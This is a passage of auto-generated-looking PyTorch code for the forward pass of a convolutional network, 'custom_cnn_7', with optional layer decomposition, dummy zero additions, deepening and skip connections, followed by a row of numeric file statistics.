X1_0 = self.conv18_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv18_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[18] == 4:
X1_0 = self.conv18_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv18_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv18_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv18_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv18(X1)
else:
X1 = self.conv18(X1)
if self.dummy_list != None:
if self.dummy_list[18] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[18]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn18(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[18] == 1:
X1 = self.conv18_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[18] == 1:
X1_skip = X1
X1 = self.conv18_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[19] == 1:
X1_0 = self.conv19_0(X1)
X1_1 = self.conv19_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[19] == 2:
X1_0 = self.conv19_0(X1)
X1_1 = self.conv19_1(X1)
X1_2 = self.conv19_2(X1)
X1_3 = self.conv19_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[19] == 3:
X1_0 = self.conv19_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv19_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[19] == 4:
X1_0 = self.conv19_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv19_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv19_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv19_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv19(X1)
else:
X1 = self.conv19(X1)
if self.dummy_list != None:
if self.dummy_list[19] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[19]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn19(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[19] == 1:
X1 = self.conv19_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[19] == 1:
X1_skip = X1
X1 = self.conv19_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[20] == 1:
X1_0 = self.conv20_0(X1)
X1_1 = self.conv20_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[20] == 2:
X1_0 = self.conv20_0(X1)
X1_1 = self.conv20_1(X1)
X1_2 = self.conv20_2(X1)
X1_3 = self.conv20_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[20] == 3:
X1_0 = self.conv20_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv20_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[20] == 4:
X1_0 = self.conv20_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv20_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv20_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv20_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv20(X1)
else:
X1 = self.conv20(X1)
if self.dummy_list != None:
if self.dummy_list[20] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[20]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn20(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[20] == 1:
X1 = self.conv20_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[20] == 1:
X1_skip = X1
X1 = self.conv20_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[21] == 1:
X1_0 = self.conv21_0(X1)
X1_1 = self.conv21_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[21] == 2:
X1_0 = self.conv21_0(X1)
X1_1 = self.conv21_1(X1)
X1_2 = self.conv21_2(X1)
X1_3 = self.conv21_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[21] == 3:
X1_0 = self.conv21_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv21_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[21] == 4:
X1_0 = self.conv21_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv21_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv21_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv21_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv21(X1)
else:
X1 = self.conv21(X1)
if self.dummy_list != None:
if self.dummy_list[21] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[21]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn21(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[21] == 1:
X1 = self.conv21_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[21] == 1:
X1_skip = X1
X1 = self.conv21_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[22] == 1:
X1_0 = self.conv22_0(X1)
X1_1 = self.conv22_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[22] == 2:
X1_0 = self.conv22_0(X1)
X1_1 = self.conv22_1(X1)
X1_2 = self.conv22_2(X1)
X1_3 = self.conv22_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[22] == 3:
X1_0 = self.conv22_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv22_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[22] == 4:
X1_0 = self.conv22_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv22_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv22_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv22_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv22(X1)
else:
X1 = self.conv22(X1)
if self.dummy_list != None:
if self.dummy_list[22] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[22]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn22(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[22] == 1:
X1 = self.conv22_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[22] == 1:
X1_skip = X1
X1 = self.conv22_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[23] == 1:
X1_0 = self.conv23_0(X1)
X1_1 = self.conv23_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[23] == 2:
X1_0 = self.conv23_0(X1)
X1_1 = self.conv23_1(X1)
X1_2 = self.conv23_2(X1)
X1_3 = self.conv23_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[23] == 3:
X1_0 = self.conv23_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv23_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[23] == 4:
X1_0 = self.conv23_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv23_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv23_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv23_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv23(X1)
else:
X1 = self.conv23(X1)
if self.dummy_list != None:
if self.dummy_list[23] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[23]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn23(X1)
X1_saved = X1
X1 = X0_skip
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[24] == 1:
X1_0 = self.conv24_0(X1)
X1_1 = self.conv24_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[24] == 2:
X1_0 = self.conv24_0(X1)
X1_1 = self.conv24_1(X1)
X1_2 = self.conv24_2(X1)
X1_3 = self.conv24_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[24] == 3:
X1_0 = self.conv24_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv24_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[24] == 4:
X1_0 = self.conv24_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv24_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv24_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv24_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv24(X1)
else:
X1 = self.conv24(X1)
if self.dummy_list != None:
if self.dummy_list[24] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[24]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn24(X1)
X1 += X1_saved
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[24] == 1:
X1 = self.conv24_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[24] == 1:
X1_skip = X1
X1 = self.conv24_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[25] == 1:
X1_0 = self.conv25_0(X1)
X1_1 = self.conv25_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[25] == 2:
X1_0 = self.conv25_0(X1)
X1_1 = self.conv25_1(X1)
X1_2 = self.conv25_2(X1)
X1_3 = self.conv25_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[25] == 3:
X1_0 = self.conv25_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv25_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[25] == 4:
X1_0 = self.conv25_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv25_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv25_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv25_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv25(X1)
else:
X1 = self.conv25(X1)
if self.dummy_list != None:
if self.dummy_list[25] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[25]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn25(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[25] == 1:
X1 = self.conv25_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[25] == 1:
X1_skip = X1
X1 = self.conv25_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[26] == 1:
X1_0 = self.conv26_0(X1)
X1_1 = self.conv26_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[26] == 2:
X1_0 = self.conv26_0(X1)
X1_1 = self.conv26_1(X1)
X1_2 = self.conv26_2(X1)
X1_3 = self.conv26_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[26] == 3:
X1_0 = self.conv26_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv26_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[26] == 4:
X1_0 = self.conv26_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv26_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv26_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv26_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv26(X1)
else:
X1 = self.conv26(X1)
if self.dummy_list != None:
if self.dummy_list[26] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[26]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn26(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[26] == 1:
X1 = self.conv26_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[26] == 1:
X1_skip = X1
X1 = self.conv26_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[27] == 1:
X1_0 = self.conv27_0(X1)
X1_1 = self.conv27_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[27] == 2:
X1_0 = self.conv27_0(X1)
X1_1 = self.conv27_1(X1)
X1_2 = self.conv27_2(X1)
X1_3 = self.conv27_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[27] == 3:
X1_0 = self.conv27_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv27_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[27] == 4:
X1_0 = self.conv27_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv27_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv27_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv27_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv27(X1)
else:
X1 = self.conv27(X1)
if self.dummy_list != None:
if self.dummy_list[27] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[27]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn27(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[27] == 1:
X1 = self.conv27_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[27] == 1:
X1_skip = X1
X1 = self.conv27_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[28] == 1:
X1_0 = self.conv28_0(X1)
X1_1 = self.conv28_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[28] == 2:
X1_0 = self.conv28_0(X1)
X1_1 = self.conv28_1(X1)
X1_2 = self.conv28_2(X1)
X1_3 = self.conv28_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[28] == 3:
X1_0 = self.conv28_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv28_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[28] == 4:
X1_0 = self.conv28_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv28_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv28_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv28_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv28(X1)
else:
X1 = self.conv28(X1)
if self.dummy_list != None:
if self.dummy_list[28] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[28]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn28(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[28] == 1:
X1 = self.conv28_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[28] == 1:
X1_skip = X1
X1 = self.conv28_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[29] == 1:
X1_0 = self.conv29_0(X1)
X1_1 = self.conv29_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[29] == 2:
X1_0 = self.conv29_0(X1)
X1_1 = self.conv29_1(X1)
X1_2 = self.conv29_2(X1)
X1_3 = self.conv29_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[29] == 3:
X1_0 = self.conv29_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv29_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[29] == 4:
X1_0 = self.conv29_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv29_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv29_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv29_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv29(X1)
else:
X1 = self.conv29(X1)
if self.dummy_list != None:
if self.dummy_list[29] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[29]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn29(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[29] == 1:
X1 = self.conv29_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[29] == 1:
X1_skip = X1
X1 = self.conv29_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[30] == 1:
X1_0 = self.conv30_0(X1)
X1_1 = self.conv30_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[30] == 2:
X1_0 = self.conv30_0(X1)
X1_1 = self.conv30_1(X1)
X1_2 = self.conv30_2(X1)
X1_3 = self.conv30_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[30] == 3:
X1_0 = self.conv30_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv30_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[30] == 4:
X1_0 = self.conv30_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv30_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv30_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv30_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv30(X1)
else:
X1 = self.conv30(X1)
if self.dummy_list != None:
if self.dummy_list[30] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[30]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn30(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[30] == 1:
X1 = self.conv30_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[30] == 1:
X1_skip = X1
X1 = self.conv30_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[31] == 1:
X1_0 = self.conv31_0(X1)
X1_1 = self.conv31_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[31] == 2:
X1_0 = self.conv31_0(X1)
X1_1 = self.conv31_1(X1)
X1_2 = self.conv31_2(X1)
X1_3 = self.conv31_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[31] == 3:
X1_0 = self.conv31_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv31_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[31] == 4:
X1_0 = self.conv31_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv31_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv31_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv31_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv31(X1)
else:
X1 = self.conv31(X1)
if self.dummy_list != None:
if self.dummy_list[31] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[31]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn31(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[31] == 1:
X1 = self.conv31_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[31] == 1:
X1_skip = X1
X1 = self.conv31_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[32] == 1:
X1_0 = self.conv32_0(X1)
X1_1 = self.conv32_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[32] == 2:
X1_0 = self.conv32_0(X1)
X1_1 = self.conv32_1(X1)
X1_2 = self.conv32_2(X1)
X1_3 = self.conv32_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[32] == 3:
X1_0 = self.conv32_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv32_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[32] == 4:
X1_0 = self.conv32_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv32_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv32_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv32_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv32(X1)
else:
X1 = self.conv32(X1)
if self.dummy_list != None:
if self.dummy_list[32] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[32]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn32(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[32] == 1:
X1 = self.conv32_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[32] == 1:
X1_skip = X1
X1 = self.conv32_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1 = self.avgpool(X1)
X1 = X1.view(-1, 64)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[33] == 1:
X1_0 = self.classifier_0(X1)
X1_1 = self.classifier_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[33] == 3:
X1_0 = self.classifier_0(X1[:, :int(torch.floor_divide(X1_shape[1],2))])
X1_1 = self.classifier_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[33] == 4:
X1_0 = self.classifier_0(X1[:, :int(torch.floor_divide(X1_shape[1],4))])
X1_1 = self.classifier_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2))])
X1_2 = self.classifier_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4))])
X1_3 = self.classifier_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.classifier(X1)
else:
X1 = self.classifier(X1)
if self.dummy_list != None:
if self.dummy_list[33] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[33]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.logsoftmax(X1)
return X1
batch_size = 1
input_features = 3072
torch.manual_seed(1234)
X = torch.randn(batch_size, input_features, device=cuda_device)
# Start Call Model
model = custom_cnn_7(input_features).to(cuda_device)
# End Call Model
model.eval()
new_out = model(X)
| 61.367077 | 178 | 0.538621 | 29,256 | 194,595 | 3.459974 | 0.007451 | 0.049998 | 0.067039 | 0.067632 | 0.978908 | 0.963191 | 0.941902 | 0.939689 | 0.908857 | 0.888871 | 0 | 0.104438 | 0.271615 | 194,595 | 3,170 | 179 | 61.386435 | 0.609722 | 0.00075 | 0 | 0.570567 | 0 | 0 | 0.001245 | 0 | 0 | 0 | 0 | 0 | 0.000355 | 1 | 0.001064 | false | 0.000355 | 0.002128 | 0 | 0.003901 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
